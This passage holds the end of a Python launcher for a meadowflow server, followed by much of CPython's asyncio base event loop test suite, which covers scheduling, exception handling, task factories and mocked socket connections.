port: int = DEFAULT_PORT,
job_runner_poll_delay_seconds: float = Scheduler._JOB_RUNNER_POLL_DELAY_SECONDS,
) -> None:
"""A function for running a meadowflow server"""
asyncio.run(start(host, port, job_runner_poll_delay_seconds))
@contextlib.contextmanager
def main_in_child_process(
host: str = DEFAULT_HOST,
port: int = DEFAULT_PORT,
job_runner_poll_delay_seconds: float = Scheduler._JOB_RUNNER_POLL_DELAY_SECONDS,
) -> Iterator[Optional[int]]:
"""
Launch server in a child process. Usually for unit tests. For debugging, it's better
to just run server_main.py manually as a standalone process so you can debug it, see
logs, etc. If there's an existing server already running, the child process will
just die immediately without doing anything.
"""
ctx = multiprocessing.get_context("spawn")
server_process = ctx.Process(
target=main, args=(host, port, job_runner_poll_delay_seconds)
)
server_process.start()
try:
logging.info(f"Process started. Pid: {server_process.pid}")
yield server_process.pid
finally:
server_process.terminate()
logging.info("Process terminated. Waiting up to 5 seconds for exit...")
server_process.join(5)
logging.info(f"Process exited with code {server_process.exitcode}")
if server_process.is_alive():
logging.info("Process alive after termination, killing.")
server_process.kill()
def command_line_main() -> None:
logging.basicConfig(level=logging.INFO)
main()
if __name__ == "__main__":
command_line_main()
|
test_base_events.py | """Tests for base_events.py"""
import concurrent.futures
import errno
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
if not support.IPV6_ENABLED:
return
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_deprecation_warnings(self):
executor = mock.Mock()
with self.assertWarns(DeprecationWarning):
self.loop.set_default_executor(executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(SystemExit):
pass
async def foo(delay):
await asyncio.sleep(delay)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
with self.assertRaises(ShowStopper):
self.loop.run_until_complete(foo(0.1))
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
async def zero_error_coro():
await asyncio.sleep(0.01)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
async def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
async def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_create_named_task_with_default_factory(self):
async def test():
pass
loop = asyncio.new_event_loop()
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_create_named_task_with_custom_factory(self):
def task_factory(loop, coro):
return asyncio.Task(coro, loop=loop)
async def test():
pass
loop = asyncio.new_event_loop()
loop.set_task_factory(task_factory)
task = loop.create_task(test(), name='test_task')
try:
self.assertEqual(task.get_name(), 'test_task')
finally:
loop.run_until_complete(task)
loop.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
# run_forever() consumes the KeyboardInterrupt and so don't log
# a warning
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
async def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
# it's a de-factor standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
async def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
